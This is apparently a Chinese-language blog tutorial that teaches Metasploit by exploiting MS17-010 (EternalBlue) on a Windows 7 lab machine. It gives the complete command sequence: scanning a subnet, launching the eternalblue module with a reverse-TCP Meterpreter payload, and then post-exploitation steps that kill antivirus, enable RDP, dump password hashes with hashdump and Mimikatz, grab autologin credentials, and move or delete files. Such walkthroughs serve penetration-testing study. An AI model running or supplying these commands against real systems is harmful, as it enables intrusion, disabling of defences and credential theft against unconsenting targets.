通过MS17_010入侵windows7来学习MSF的使用方法

1.前言:

Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段。这次使用抛砖引玉的方法,通过对MS17_010漏洞的复现,来学习Metasploit。单纯的写Metasploit估计一本书都不够写的。可以使用NMAP去扫描目标机是否开启的445端口,但是NMAP批量的去扫描主机掉包率会比单主机扫描要大。如果你不知道端口对应的服务是什么可以参考这篇文章:http://msfconsole.com/cyld/

2.准备工作:

漏洞环境:

攻击机:Kali Linux
靶机:Windows 7 sp1或sp2


开始之前先来熟悉一下MSF的基本目录语法:

Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoders(编码工具模块)。


3.漏洞复现:

输入msfconsole进入msf查找相关的攻击模块。

如果你要批量的检测你局域网下的主机是否都存在ms17_010的模块利用,可以使用辅助模块auxiliary/scanner/smb/smb_ms17_010。当然你也可以使用nmap去扫描主机开放端口。

  • use auxiliary/scanner/smb/smb_ms17_010 //使用检测模块
  • set rhosts 192.168.1.1-100 //检测1-100之间的主机是否存在ms17_010漏洞利用
  • set threads 10 你还可以设置攻击线程
  • run 或者 exploit //检测(运行)
    //这里提醒一下大家在MSF中如主机设置地址为:rhosts则是可以多主机扫描或者攻击的。如果是rhost则是不能多主机扫描或攻击的。

发现192.168.1.5这台主机是存在ms17-010利用漏洞的,这里还可以使用nmap去进行侦测。

发现敏感端口是打开的话,我们就开始查找ms17-010的攻击模块。

  • use exploit/windows/smb/ms17_010_eternalblue //使用攻击模块
  • set rhosts 192.168.1.5 //设置目标地址
  • set payload windows/x64/meterpreter/reverse_tcp //设置反弹模块
  • set lhost 192.168.1.4 //设置反弹地址
  • run 或者 exploit // 执行

可以看到我们利用成功了,使用getuid看到我们获取了最高的权限。

查看系统信息:sysinfo

查看是否为虚拟机:run post/windows/gather/checkvm

查看目标机运行时间:idletime

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议,开启3389端口:run post/windows/manage/enable_rdp

列举当前登陆过的用户:run post/windows/gather/enum_logged_on_users

列举安装在目标机上的应用程序:run post/windows/gather/enum_applications

将当前Meterpreter终端隐藏在后台:background

需要重新调用终端:可以使用session查看连接存活主机,使用 sessions -i  2连接,2代表的是ID号。

抓取自动登陆的用户密码:run windows/gather/credentials/windows_autologin


下载c盘下1.txt文件到/home目录下:
download c:\1.txt /root

上传/home目录下1.txt文件到c盘下:
upload /root/1.txt c:\

查看c:\123.txt文件
cat c:/123.txt

删除C:\123.txt文件
rm c:/123.txt

截取屏幕
screenshot

以上的msf命令不是很全面,如需深入了解,可以进入官网才看官方文档。


密码抓取:

1.使用Hashdump抓取密码

Hashdump Meterpreter脚本可以从目标机中提取Hash值,破解Hash值即可获得登陆密码。计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要想访问就必须有“系统级”账号。所以要使用改名了就必须进行权限提升。

2.使用Mimikatz抓取密码

查看了使用方法开始抓取hash。

获取系统账户信息:mimikatz_command -f samdump::hashes

也可以输入shell进入cmd权限

设置编码就可以不乱码了。


作者:龙狮
出处:msfconsole.com/cyld3/
版权说明:转发标明出处
关注我们:如果你喜欢我们的文章或我们的网站可以在文章最下方的输入框输入邮箱订阅,好文章将会第一时间推送

Show Comments

Get the latest posts delivered right to your inbox.